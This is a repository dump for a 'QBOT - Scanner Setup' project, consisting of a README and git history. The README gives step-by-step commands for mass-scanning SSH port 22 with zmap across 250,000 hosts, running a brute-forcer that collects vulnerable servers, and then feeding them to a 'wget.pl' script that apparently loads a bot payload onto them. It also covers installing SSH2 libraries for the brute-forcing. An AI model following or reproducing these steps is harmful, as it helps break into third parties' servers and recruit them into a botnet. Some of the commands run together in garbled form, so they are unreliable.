======================: FILES :======================
======================: README CONTENT :======================

# QBOT - Scanner Setup
VPS Centos 6

yum install perl -y

sh zmap_auto_install.sh

zmap -p22 -o mfu.txt -B100M -N 250000

^^ Wait Till Finished ^^

chmod 777 *

./update 15000

cat vuln.txt | sort | uniq > nodupes.txt

perl wget.pl nodupes.txt



Fix SSH2 Issues //this will take a while:

yum install gcc cpan php-pear php-devel libssh2 libssh2-devel -y

pecl install -f ssh2 touch /etc/php.d/ssh2.ini echo

extension=ssh2.so>/etc/php.d/ssh2.ini

cpan -fi Net::SSH2

cpan -fi Parallel::ForkManager 
====================== GIT HISTORY: ======================
56f7e39 HEAD@{0}: clone: from https://github.com/llraudseppll/qbot_scanner
commit 56f7e390c7399934100f402b05f5d8a1d9e15e3d
Author: Alexandr Stardust <50292087+l2lstardustl2l@users.noreply.github.com>
Date:   Tue Jun 4 09:27:38 2019 +0300

    Create README.md

commit 73499ab73961a2db719f0f0a80281c696c9ad50a
Author: Alexandr Stardust <50292087+l2lstardustl2l@users.noreply.github.com>
Date:   Tue Jun 4 01:20:19 2019 +0300

    Add files via upload
